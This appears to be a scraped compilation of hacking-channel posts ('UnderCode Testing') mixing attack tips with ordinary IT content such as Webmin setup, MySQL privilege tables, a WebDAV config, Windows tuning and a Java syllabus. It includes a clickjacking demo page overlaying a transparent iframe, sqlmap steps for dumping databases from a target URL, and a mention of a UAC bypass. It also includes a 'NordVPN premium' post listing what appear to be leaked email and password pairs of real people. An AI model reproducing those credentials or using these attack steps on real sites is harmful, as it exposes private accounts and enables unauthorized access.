Respecting Lebanon & Lebanese here...

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑The clickjacking attack :

1) The “clickjacking” attack allows an evil page to click on a “victim site” on behalf of the visitor.

2) Many sites were hacked this way, including Twitter, Facebook, Paypal and other sites. They have all been fixed, of course.

The idea
The idea is very simple.

3) Here’s how clickjacking was done with Facebook:

E X A M P L E :

4) A visitor is lured to the evil page. It doesn’t matter how.
The page has a harmless-looking link on it (like “get rich now” or “click here, very funny”).

5) Over that link the evil page positions a transparent <iframe> with src from facebook.com, in such a way that the “Like” button is right above that link. Usually that’s done with z-index.

6) In attempting to click the link, the visitor in fact clicks the button.
The demo

7) Here’s how the evil page looks. To make things clear, the <iframe> is half-transparent (in real evil pages it’s fully transparent):

<style>
iframe { /* iframe from the victim site */
  width: 400px;
  height: 100px;
  position: absolute;
  top:0; left:-20px;
  opacity: 0.5; /* in real opacity:0 */
  z-index: 1;
}
</style>

<div>Click to get rich now:</div>

<!-- The url from the victim site -->
<iframe src="/clickjacking/facebook.html"></iframe>

<button>Click here!</button>

<div>...And you're cool (I'm a cool hacker actually)!</div>

E N J O Y ❤️👍🏻
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑How to set up a black and white list of web pages and prohibit computers from accessing certain websites

1) Control the USB port. It is forbidden to connect the computer to USB storage devices (U disk, mobile phone, tablet, mobile hard disk, SD card, USB optical drive, etc.), but does not control USB non-storage devices, such as mouse, keyboard, etc. You can also set a specific USB storage device, that is, the computer can only recognize the USB storage device, and you can also set this specific storage device to only copy files to the computer, but not from the computer to it. You can also set a password to copy files.

2) Control the transmission of files from the external network. It is forbidden to send files through the external network, including: setting a specific QQ account to log in or allowing QQ chat, prohibiting QQ uploading files, prohibiting QQ group uploading files, allowing WeChat chatting, prohibiting WeChat uploading files, prohibiting the use of network disks, prohibiting the use of cloud disks, and prohibiting Use mailboxes, prohibit the use of FTP, prohibit the use of any network application to transfer files, etc.

3) Control the transmission of files in the intranet. It is forbidden to use any intranet communication tools, such as Fei Ge, Fei Qiu, etc., and it can also prohibit LAN communication, network sharing, and network cable transmission of computer files.

4) Other methods. It is prohibited to use Bluetooth to send files, prohibit the use of infrared to send files, prohibit computers to install portable wifi to send files, prohibit computers to install wireless routers to send computer files, prohibit computers to install virtual machines to send files, prohibit remote desktops to send computer files, prohibit the use of clipboards, Screenshots etc. are prohibited.

E N J O Y ❤️👍🏻
@UndercodeTesting
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑FastTips SqlMap for #termux :

1) apt-get update

2) apt-get upgrade

3) pkg install perl

4) pkg install python2

5) pkg install git

6) git clone https://github.com/sqlmapproject/sqlmap

7) cd sqlmap

8) python2 swlmap.py

9) python2 sqlmap.py -u #website_link --dbs

10) python2 sqlmap.py -u #website_link --dbs --columns

@UndercodeTesting
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Apple Touch ID vulnerability could allow attackers to hijack iCloud account
#NEWS


> Earlier this year, Apple fixes iOS and a macOS the security vulnerability , the vulnerability could allow an attacker to gain unauthorized access to a user's iCloud account.

> This Alkemade, a security expert at IT security company Computest, discovered the vulnerability in February. The vulnerability exists in the TouchID (or FaceID) biometric feature implemented by Apple, which authenticates users to log in to websites on Safari. These are the websites that use Apple ID to log in. After the vulnerability was reported to Apple through the disclosure program, the iPhone manufacturer resolved the vulnerability in a server-side update .

🦑Certification defects :
The core of the vulnerability is: when a user tries to log in to a website that requires Apple ID, it will be prompted to use Touch ID to authenticate the login. Doing so will skip the two-factor authentication step, because it already uses multiple factors for identification, such as equipment and biometric information. When logging in to an Apple domain (such as "icloud.com"), ID and password are usually used for comparison. The website embeds an iframe pointing to Apple’s login authentication server ("https://idmsa.apple.com"). Handle the authentication process.

#NEWS
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑What is Webmin

Simply put, Webmin is a Web-based Unix system management tool. The administrator accesses various management functions of Webmin through the browser and completes the corresponding management actions. At present, Webmin supports most Unix systems. In addition to various versions of Linux, these systems also include: AIX, HPUX, Solaris, Unixware, Irix and FreeBSD.

🦑Compared with other GUI management tools, Webmin has the following significant advantages:

* Web management method enables Webmin to have both local and remote management capabilities;
* Plug-in structure makes Webmin have strong scalability and flexibility. At present, the standard management modules provided by Webmin almost cover common Unix management, and third-party management modules are constantly being developed;
* Access control and SSL support provide sufficient security for remote management;
* Internationalization support, providing multi-language version

is installed Webmin

some linux distributions have been pre-installed Webmin, such as OpenLinux and soft Linux. If your Linux version does not include Webmin, you can download Webmin's RPM package and TARBALL to install.

🦑The following are the installation steps of TAR BALL:

* To install Webmin, you need to install perl 5.0.6 or above. If perl is not installed on the target system, you need to download and install {perl-for-linux} from http://www.cpan.org, and also need to install common perl modules; if you need Webmin to support SSL, you also need to install OpenSSL and perl module Net::SSLeay.
* Go to http://www.webmin.com/ to download webmin-0.91.tar.gz
* Unpack webmin-0.91.tar.gz to the directory where you want to install Webmin, such as /usr/local/webmin
* Run the installation script setup.pl. The installation process will ask for the Webmin configuration file directory, the Log directory and the system's listening port (the default is 10000), and you will also be asked to set the administrator password. The installation script will also install Webmin as a system daemon, which is automatically started when the system is turned on.
* Restart the system and visit http://localhost:10000. If the login interface of Webmin appears, the installation is successful.

🦑Webmin using UNIX system management

has already been said, all management functions are inserted in the form of a module in Webmin. Webmin categorizes various management modules. The main categories are: Webmin, systems, services, hardware and others. When you successfully log in to the home page of Webmin, these categories will be displayed in front of you in different property pages. The picture below is the home page of a Webmin server.

written by
@UndercodeTesting
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 how to determine the first matching record, which is not based on the natural order of the records in the data table. definite. The priority of each record in each data table is arranged as follows:
#ProTips

(1) User table: Determined according to the order of host first and user. The search rules are as follows: records that do not contain wildcard characters, records that contain wildcard characters, and empty records. In the same host, continue to arrange according to user, the rules are the same as above.

(2) db table: the order of retrieval is determined by the host field: records that do not contain wildcards, records that contain wildcards, and empty records.

(3) Host table: The search order is determined according to the host field: records that do not contain wildcards, records that contain wildcards, and empty records. We use the following example to illustrate the rules for matching search:

Please remember that if you change these data tables, you must use mysqladmin reload to make it effective.

The following is how the system performs the search:

+-----------+---------+-
| Host | User | ...
+-----------+---------+-
|% | root | ...
|% | jeffrey | ...
| localhost | root | ...
| localhost | | ...
+-----------+---------+- The

🦑search order should be:

localhost/root
localhost/any
any/jeffrey
any/root
like this, if If the user jeffrey on localhost wants to connect to the database, his authorization should be based on the permissions specified in the localhost/"any" line instead of the permissions specified in the "any"/jeffrey line. Please pay attention to this point, because if the configuration is not appropriate It may make you unable to use this database system normally.


written by
@UndercodeTesting
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Follow Undercode Testing on :

> Twitter
> Twitter

> instagram

> Facebook

> Pinterest

> Linkedln

> Youtube

> Telegram

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑webdav command line interface is really easy to use so you can easily create a WebDAV server for your own user.

🄸🄽🅂🅃🄰🄻🄻🄸🅂🄰🅃🄸🄾🄽 & 🅁🅄🄽 :

1)git clone https://github.com/hacdias/webdav.git

2) By default, it runs on a random free port and supports JSON, YAML and TOML configuration. An example of a YAML configuration with the default configurations:

3) # Server related settings
address: 0.0.0.0
port: 0
auth: true
tls: false
cert: cert.pem
key: key.pem
prefix: /

4) # Default user settings (will be merged)
scope: .
modify: true
rules: []

5) # CORS configuration
cors:
enabled: true
credentials: true
allowed_headers:
- Depth
allowed_hosts:
- http://localhost:8080
allowed_methods:
- GET
exposed_headers:
- Content-Length
- Content-Range

6) users:
- username: admin
password: admin
scope: /a/different/path
- username: encrypted
password: "{bcrypt}$2y$10$zEP6oofmXFeHaeMfBNLnP.DO8m.H.Mwhd24/TOX2MWLxAExXi4qgi"
- username: "{env}ENV_USERNAME"
password: "{env}ENV_PASSWORD"
- username: basic
password: basic
modify: false
rules:
- regex: false
allow: false
path: /some/file

7) There are more ways to customize how you run WebDAV through flags and environment variables. Please run webdav --help for more information on that.

8) CORS
The allowed_* properties are optional, the default value for each of them will be *. exposed_headers is optional as well, but is not set if not defined. Setting credentials to true will allow you to:

▪️Use withCredentials = true in javascript.
▪️Use the username:password@host syntax.

E N J O Y ❤️👍🏻
@UndercodeTesting
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑AGAIN NEW NORDVPN PREMIUM ✅

j-lochner@hotmail.com:Harley12 | Expiration = 2020-11-13 16:40:11
j.leening@gmail.com:Melbourne1984! | Expiration = 2021-04-21 10:14:04
j199@hotmail.com:happy199 | Expiration = 2023-03-27 17:18:13
jae.toledo@gmail.com:Snickers1 | Expiration = 2020-08-01 09:58:35
jaime8726.jm@gmail.com:Jaime6278 | Expiration = 2020-10-14 18:06:45
Jake_Tatt@hotmail.com:halorules12 | Expiration = 2020-08-02 19:47:07
jakebarryb@gmail.com:548julia | Expiration = 2020-10-20 14:36:30
jakemsawyer@outlook.com:Tokulerok1! | Expiration = 2020-08-25 22:14:11
jamela3@students.fscj.edu:Badass15! | Expiration = 2022-05-11 20:09:26
james.r.foster86@gmail.com:Itsasecret86 | Expiration = 2021-05-01 19:39:44
james1983thompson@hotmail.com:Arsenal01 | Expiration = 2022-09-15 11:10:41
Jamesd10886@hotmail.com:Jimjam99 | Expiration = 2021-12-04 04:48:57

E N J O Y ❤️👍🏻

BYPASSING UAC ON WINDOWS 10 USING DISK CLEANUP
full with pictures

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑FastTips for speedup windows 10 :

1) Disable Startup Programs

2) Switch to the “Startup” tab and check for unnecessary apps with higher impact on the system. You can do so by clicking on “Startup Impact” label. Next, right-click on applications and click on “Disable”. Do this for every unnecessary app. This will speed up Windows 10 every time you turn on your PC.

3) Disable Background Apps
Background apps are Windows apps which run in the background to receive notifications and updates. While messaging and email apps may require background sync, apps like Candy Crush and Calculator don’t need it at all. These apps constantly run in the background and make the computer slow, besides draining the battery. So to speed up Windows 10, first disable the background apps. Here is how to do it.

4) Regularly, then you may skip this section. However, if you don’t use Cortana and want to limit your search to just PC, then it’s better to disable it at once. This will save you a lot of computer resources as Cortana keeps hogging memory and important resources in the background. Follow these steps to disable Cortana and speed up Windows 10 significantly.

5) Uninstall Multiple Antivirus Programs
It is a bad idea to install multiple Antivirus programs to secure your PC. Antivirus checks file integrity in the background which in turn eats disk usage. Having multiple antiviruses will further make your computer slow. In fact, installing an antivirus on Windows 10 is completely avoidable as it comes with Windows Defender pre-installed. And frankly, it’s pretty good and reliable. In case, your PC is attacked by some rogue virus and Windows Defender is unable to remove it then we recommend you to install Malwarebytes to clean up your PC. Malwarebytes will speed up Windows 10 and also remove the viruses.

6) Change Power Plan to high performance

7) Disable Windows UpdateBlock Telemetry Service
Windows is increasingly tracking users with its various tools and techniques. It constantly sends and retrieves data to its server in the background. All these background telemetry services hog down crucial computer resources which further makes your PC slow down. So to block these telemetry services from running in the background, you can use a personalized host file. It blocks the server and the PC from establishing a communication. A user named Scorthyn on Reddit has created the host file and you can use it on your Windows 10 PC

8) Disable Indexing on Older Windows 10 PCs
In simple terms, Indexing means keeping a list of all the files located in your PC. It helps Windows in finding the file quickly when you hit the search button. However, on older PCs, the indexing process eats up too many resources and makes the PC remarkably slow. Note that if you are using a Windows PC with powerful configs then disabling indexing will not make a considerable difference.

9) Debloat Windows 10
Of late, Windows has become incredibly bloated with useless apps and services. These apps take up crucial RAM, processing power and disk space. It significantly slows down the system and you are left with a laggy mess. The sad part is that you can’t even uninstall these apps through the Control Panel


10) Keep a Check on Background Processes

11) Use an Efficient Browser
Most of us use a web browser on our Windows 10 PC to browse the internet. In my case, I use Chrome all the time because I am deep into the Google’s ecosystem. However, it is quite popularly know that Chrome is a resource hogger. It really eats up most of my computer resources, making it slow and overall laggy for a few seconds

12) Switch to an SSD
I believe Windows 10 is a great Operating Systemv — almost as good as the macOS — but it has been marred by sloppy hardware over the years. Most of us use Windows 10 on a mechanical hard drive(HDD) which is quite slow and further results in slow performance.

E N J O Y ❤️👍🏻
@UndercodeTesting
written combined between wiki & redit
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Java se basics
1). Java basic data types and expressions, branch and loop.

2). Use of String and StringBuffer, regular expressions.

3). Object-oriented abstraction, encapsulation, inheritance, polymorphism, class and object, object initialization and recovery; constructor, this keyword, method and method parameter passing process, static keyword, internal class.

4). Object instantiation process, method coverage, final keywords, abstract classes, interfaces, inheritance advantages and disadvantages analysis; object polymorphism: conversion between subclasses and parent classes, abstract classes and interfaces are many Application in the state, the benefits of polymorphism.

5). Java exception handling, the mechanism of exception.

6). Commonly used design patterns: Singleton, Template, Strategy patterns.

7). JavaAPI introduction: a kind of basic data type packaging class, System and Runtime class, Date and DateFomat class, etc.

8). Java collection introduction: Collection, Set, List, ArrayList, LinkedList, Hashset, Map, HashMap, Iterator and other commonly used collection APIs.

9).JavaI/O input and output streams: File and FileRandomAccess classes, byte stream InputStream and OutputStream, character stream Reader and Writer, and corresponding implementation classes, IO performance analysis, byte and character conversion stream, and the concept of packaging stream, And commonly used packaging, computer coding.

10). Java advanced features: reflection and generics.

11). Multithreading principle: how to create multithreading (Thread, Runnable) in the program, thread safety issues, thread synchronization, communication between threads, deadlock.

12). You can remember some of the Java knowledge points you encounter daily with cloud notes such as Youdaoyun, such as the syntactic sugar of java8

E N J O Y ❤️👍🏻
@UndercodeTesting
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁